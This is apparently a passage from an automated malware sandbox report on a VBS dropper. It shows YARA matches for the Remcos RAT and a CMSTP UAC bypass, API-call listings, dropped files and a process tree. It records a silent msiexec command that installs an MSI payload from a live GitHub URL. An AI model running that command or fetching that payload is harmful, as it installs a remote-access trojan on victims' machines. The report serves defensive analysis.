                      Source: 30.2.cmd.exe.4c23b90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.2bd4848.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.4ff46c4.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000020.00000002.3108485798.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000017.00000002.2755264970.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: http_dll.dll.3.drBinary string: Software\ESET\ESET Security\CurrentVersion\InfoAppDataDirInstallDirScannerVersionInstallDir32x86\\Device\LanmanRedirector\;%c:Enable@My profileActive${ProfileName}=|NODE;NAME=;TYPE=SUBNODE${PluginID}=Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\ProfilesSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILESDllGetVersioncomctl32.dllInitCommonControlsExUpdateModuleAfterRestartAllowOnlyWhiteListUrlInstallationLevelDontAskForTrustedZoneAllowChangeSignedFilegui_RuleShowLevelAdvancedModegui_SeeApplicationHowRedirectByProxyEnabledPop3sPortsStr995HttpsPortsStr443BlockSslV2SslCompatibleModeAddRootCertToBrowsersSslRootCreateTimePop3sScanModeHttpsScanModeAskIfCertIsNotTrustedAskIfRootCertIsUnknownSslUseModeLearningEndTimeSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningModeSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=UntrustedOut;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\UntrustedOutSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=UntrustedIn;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\UntrustedInSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=TrustedOut;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\TrustedOutMaxSameRulesAddRemoteAddressAddRemotePortAddLocalPortAddApplicationSECTION;ID=#01000103\SETTINGS\PLUGINS\PLUGIN;ID=#${PluginID}\PROFILES\NODE;NAME=${ProfileName};TYPE=SUBNODE\NODE;NAME=LearningMode;TYPE=SUBNODE\NODE;NAME=TrustedIn;TYPE=SUBNODEHKLM\Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles\${ProfileName}\LearningMode\TrustedInWriteBlockedToPcapDisplayNameSubjectPublicKeyBlobCertificateCertificatesNode_H^I @
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@34/38@2/3
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_0040320C
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,7_2_004044D1
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: GetCommandLineW,GetModuleFileNameW,OpenSCManagerW,wcsstr,CreateServiceW,CloseServiceHandle,CloseServiceHandle,RegOpenKeyExW,RegSetValueExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,RegCloseKey,CloseServiceHandle,6_2_00401580
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: GetCommandLineW,GetModuleFileNameW,OpenSCManagerW,wcsstr,CreateServiceW,CloseServiceHandle,CloseServiceHandle,RegOpenKeyExW,RegSetValueExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,RegCloseKey,CloseServiceHandle,15_2_00401580
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004020D1 CoCreateInstance,MultiByteToWideChar,7_2_004020D1
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2043AC00 FindResourceW,LoadResource,LockResource,SizeofResource,6_2_2043AC00
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401550 StartServiceCtrlDispatcherW,6_2_00401550
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401550 StartServiceCtrlDispatcherW,6_2_00401550
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_00401550 StartServiceCtrlDispatcherW,15_2_00401550
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML3D32.tmpJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF5F00B5FE69ED3BD9.TMPJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: http_dll.dll6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StartHttpServer6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StopHttpServer6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: -app6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: http_dll.dll15_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StartHttpServer15_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: StopHttpServer15_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCommand line argument: -app15_2_00401000
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Updwork.exe "C:\Users\user\AppData\Local\Temp\Updwork.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: unknownProcess created: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe "C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qnJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Updwork.exe "C:\Users\user\AppData\Local\Temp\Updwork.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
